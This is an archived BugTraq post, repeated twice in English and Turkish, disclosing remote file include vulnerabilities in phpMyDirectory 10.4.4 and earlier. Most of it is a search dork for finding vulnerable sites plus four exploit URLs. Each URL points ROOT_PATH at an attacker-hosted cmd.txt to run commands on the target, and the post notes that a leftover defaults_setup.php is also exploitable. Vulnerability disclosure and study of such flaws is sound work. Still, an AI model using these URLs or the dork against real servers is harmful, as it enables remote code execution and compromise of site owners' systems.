BugTraq
Back to list
|
Post reply
phpMyDirectory <= 10.4.4 Multiple Remote File Include(new!)
May 22 2006 06:35PM
ajannhwt hotmail com
ENGLISH
# Title : phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities
# Dork : "powered by phpmydirectory"
# Author : ajann
# greetz : Nukedx,TheHacker
# Exploit;
### http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://your
host.com/cmd.txt?cmd=ls
### http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourh
ost.com/cmd.txt?cmd=ls
### http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/
cmd.txt?cmd=ls
### SOME; http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http:/
/yourhost.com/cmd.txt?cmd=ls
# ajann,Turkey
TURKISH
# Başlık : phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities
# Sözcük[Arama] : "powered by phpmydirectory"
# Açığı Bulan : ajann
# greetz : Nukedx,TheHacker
# Açık bulunan dosyalar;
### http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://your
host.com/cmd.txt?cmd=ls
### http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourh
ost.com/cmd.txt?cmd=ls
### http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/
cmd.txt?cmd=ls
### SOME; http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http:/
/yourhost.com/cmd.txt?cmd=ls
Açıklama:
Temalarda bulunan footer.php dosyası güvenlik açığına yol açmaktadır.Bu sayede uzaktan kod çalıştırılabilir.
defaults_setup.php kurulumdan sonra silinmemişse aynı açık uygulanabilmektedir.
test/header.php bölümü ise bazen denk gelmektedir,aynı açık bulunmaktadır.
Açık 10.4.4 dahil alt sürümlerinde çalışmaktadır.
Thanks.
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
# Title : phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities
# Dork : "powered by phpmydirectory"
# Author : ajann
# greetz : Nukedx,TheHacker
# Exploit;
### http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://your
host.com/cmd.txt?cmd=ls
### http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourh
ost.com/cmd.txt?cmd=ls
### http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/
cmd.txt?cmd=ls
### SOME; http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http:/
/yourhost.com/cmd.txt?cmd=ls
# ajann,Turkey
TURKISH
# Başlık : phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities
# Sözcük[Arama] : "powered by phpmydirectory"
# Açığı Bulan : ajann
# greetz : Nukedx,TheHacker
# Açık bulunan dosyalar;
### http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://your
host.com/cmd.txt?cmd=ls
### http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourh
ost.com/cmd.txt?cmd=ls
### http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/
cmd.txt?cmd=ls
### SOME; http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http:/
/yourhost.com/cmd.txt?cmd=ls
Açıklama:
Temalarda bulunan footer.php dosyası güvenlik açığına yol açmaktadır.Bu sayede uzaktan kod çalıştırılabilir.
defaults_setup.php kurulumdan sonra silinmemişse aynı açık uygulanabilmektedir.
test/header.php bölümü ise bazen denk gelmektedir,aynı açık bulunmaktadır.
Açık 10.4.4 dahil alt sürümlerinde çalışmaktadır.
Thanks.
[ reply ]